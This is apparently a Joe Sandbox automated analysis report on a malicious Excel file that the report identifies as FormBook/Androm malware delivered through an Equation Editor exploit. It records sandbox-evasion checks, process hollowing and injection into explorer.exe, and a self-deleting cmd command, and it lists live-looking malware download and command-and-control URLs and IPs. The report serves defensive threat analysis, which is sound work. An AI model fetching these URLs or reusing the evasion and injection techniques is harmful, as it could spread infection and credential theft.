Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042A8F4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\Public\vbc.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000002118604 second address: 000000000211860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 000000000211899E second address: 00000000021189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | RDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe | RDTSC instruction interceptor: First address: 0000000003BC8604 second address: 0000000003BC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe | RDTSC instruction interceptor: First address: 0000000003BC899E second address: 0000000003BC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe | RDTSC instruction interceptor: First address: 0000000003A18604 second address: 0000000003A1860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe | RDTSC instruction interceptor: First address: 0000000003A1899E second address: 0000000003A189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042D734
Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_0042D734
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_0042D734
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2812 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2128 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Odhbljup.exe TID: 1184 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Odhbljup.exe TID: 1712 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0042D734
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_0042D734
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02E966E8 rdtsc
Source: C:\Users\Public\vbc.exe | Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
Source: C:\Users\user\Odhbljup.exe | Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
Source: C:\Users\user\Odhbljup.exe | Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
Source: explorer.exe, 00000006.00000000.544520820.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004244DC GetSystemInfo,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00459820 LoadLibraryA,GetProcAddress,
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FD26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
Source: C:\Users\user\Odhbljup.exe | Process queried: DebugPort
Source: C:\Users\user\Odhbljup.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process queried: DebugPort
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02E966E8 rdtsc
Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
Source: C:\Users\user\Odhbljup.exe | Process token adjusted: Debug
Source: C:\Users\user\Odhbljup.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FC00C4 NtCreateFile,LdrInitializeThunk,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 87.98.234.164 80
Source: C:\Windows\explorer.exe | Domain query: www.urzeczenie.com
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 870000
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Thread register set: target process: 1764
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp | Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\Public\vbc.exe | Code function: GetLocaleInfoA,
Source: C:\Users\Public\vbc.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Users\Public\vbc.exe | Code function: GetLocaleInfoA,
Source: C:\Users\Public\vbc.exe | Code function: GetLocaleInfoA,
Source: C:\Users\Public\vbc.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\Odhbljup.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\Odhbljup.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Odhbljup.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Users\user\Odhbljup.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Odhbljup.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Odhbljup.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\Odhbljup.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\Odhbljup.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Odhbljup.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Users\user\Odhbljup.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Odhbljup.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Odhbljup.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00409F7C GetLocalTime,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0043DD6C GetVersion,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

(Digits following a technique name are the count badges from the original matrix, run together by extraction.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 11 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 14 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules 1 | Application Shimming 1 | Application Shimming 1 | Obfuscated Files or Information 3 | LSASS Memory | File and Directory Discovery 2 | Remote Desktop Protocol | Screen Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 13 | Registry Run Keys / Startup Folder 1 | Process Injection 512 | Software Packing 1 | Security Account Manager | System Information Discovery 116 | SMB/Windows Admin Shares | Input Capture 11 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Command and Scripting Interpreter 1 | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | DLL Side-Loading 1 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 111 | LSA Secrets | Security Software Discovery 341 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Modify Registry 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 512 | Proc Filesystem | Application Window Discovery 11 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

              Behavior Graph


              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 532894 | Sample: 7009.xlsx | Start date: 02/12/2021 | Architecture: WINDOWS | Score: 100

[Behavior graph image not recoverable from the page; the node and edge text that survived extraction is condensed here.]
Root: www.voucheraja.com; signatures "Found malware configuration", "Malicious sample detected (through community Yara rule)", "Antivirus detection for URL or domain" and 13 other signatures. Started processes: EQNEDT32.EXE and EXCEL.EXE.
EQNEDT32.EXE: contacts 13.250.31.113 port 80 (AMAZON-02, United States); drops C:\Users\user\AppData\Local\...\binso[1].exe (PE32) and C:\Users\Public\vbc.exe (PE32); signature "Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)"; starts vbc.exe.
EXCEL.EXE: drops C:\Users\user\Desktop\~$7009.xlsx (data).
vbc.exe: contacts prigmg.am.files.1drv.com, onedrive.live.com and am-files.fe.1drv.com; drops C:\Users\user\Odhbljup.exe (PE32); signatures "Multi AV Scanner detection for dropped file", "Machine Learning detection for dropped file", "Drops PE files to the user root directory" and 6 other signatures; injects into explorer.exe.
explorer.exe (injected): contacts urzeczenie.com at 87.98.234.164 port 80 (OVH, France) and www.urzeczenie.com; signature "System process connects to network (likely due to code injection or exploit)"; starts Odhbljup.exe (two instances) and NAPSTAT.EXE.
Odhbljup.exe: contacts prigmg.am.files.1drv.com, onedrive.live.com and am-files.fe.1drv.com; signatures "Multi AV Scanner detection for dropped file", "Machine Learning detection for dropped file", "Tries to detect virtualization through RDTSC time measurements", "Contains functionality to detect sleep reduction / modifications".
NAPSTAT.EXE: signatures "Modifies the context of a thread in another process (thread injection)", "Maps a DLL or memory area into another process"; starts cmd.exe.


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
7009.xlsx | 35% | Virustotal |
7009.xlsx | 40% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\Odhbljup.exe | 100% | Joe Sandbox ML |
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe | 36% | ReversingLabs | Win32.Backdoor.Androm
C:\Users\user\Odhbljup.exe | 36% | ReversingLabs | Win32.Backdoor.Androm
C:\Users\Public\vbc.exe | 36% | ReversingLabs | Win32.Backdoor.Androm

              Unpacked PE Files


              Domains

              No Antivirus matches

              URLs

Source | Detection | Scanner | Label
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.urzeczenie.com/hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://13.250.31.113/7009/binso.exe | 100% | Avira URL Cloud | malware
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
www.heidecide.xyz/hno0/ | 100% | Avira URL Cloud | phishing
http://www.%s.comPA | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
urzeczenie.com | 87.98.234.164 | true | false | | high
www.voucheraja.com | unknown | unknown | false | | high
onedrive.live.com | unknown | unknown | false | | high
www.urzeczenie.com | unknown | unknown | false | | high
prigmg.am.files.1drv.com | unknown | unknown | false | | high

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.urzeczenie.com/hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== | true | Avira URL Cloud: malware | unknown
http://13.250.31.113/7009/binso.exe | true | Avira URL Cloud: malware | unknown
www.heidecide.xyz/hno0/ | true | Avira URL Cloud: phishing | low

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | false | | high
http://investor.msn.com | EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://crl.entrust.net/server1.crl0 | vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | false | | high
http://ocsp.entrust.net03 | vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://onedrive.live.com/h | vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp | false | | high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://prigmg.am.files.1drv.com/y4mfRNWO7SrNuAYoryEOMK_9RlPbjHtMV-Ced5E-MYQaa4drd6L19k6a-_ziTYMgTYz | vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | false | | high
http://www.diginotar.nl/cps/pkioverheid0 | vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://prigmg.am.files.1drv.com/ | vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp | false | | high
https://onedrive.live.com/ | vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp | false | | high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp | false | | high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmp | false | | high
https://prigmg.am.files.1drv.com/y4mqjjzWO8S-4gOMPNZjROyLuecmLMO_yUlIbF8EkCZOGaN9ucABdXCb_4exrao8vW7 | vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp | false | | high
http://investor.msn.com/ | EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.524090665.00000000044E7000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
https://prigmg.am.files.1drv.com/y4mwh1Q_kqHdVkzavMrAxJ1wAVvTumvDrRTyon4A-0Nej1qBpoUH6im7VZQh8GfsFzJ | vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | false | | high
http://ocsp.entrust.net0D | vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                                                      https://secure.comodo.com/CPS0vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpfalse
                                                        high
                                                        http://crl.entrust.net/2048ca.crl0vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpfalse
                                                          high
                                                          https://onedrive.live.com/download?cid=019F6FABB02B7788&resid=19F6FABB02B7788%21112&authkey=AE1p912Kvbc.exe, 00000004.00000002.562388389.0000000003440000.00000004.00000001.sdmpfalse
                                                            high

                                                            Contacted IPs


                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
87.98.234.164 | urzeczenie.com | France | 16276 | OVHFR | false
13.250.31.113 | unknown | United States | 16509 | AMAZON-02US | true

                                                            General Information

                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                            Analysis ID:532894
                                                            Start date:02.12.2021
                                                            Start time:19:32:36
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 12m 59s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:7009.xlsx
                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                            Number of analysed new started processes analysed:16
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winXLSX@11/33@8/2
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 41.6% (good quality ratio 40.6%)
                                                            • Quality average: 81.7%
                                                            • Quality standard deviation: 24.7%
                                                            HCA Information:
                                                            • Successful, ratio: 89%
                                                            • Number of executed functions: 0
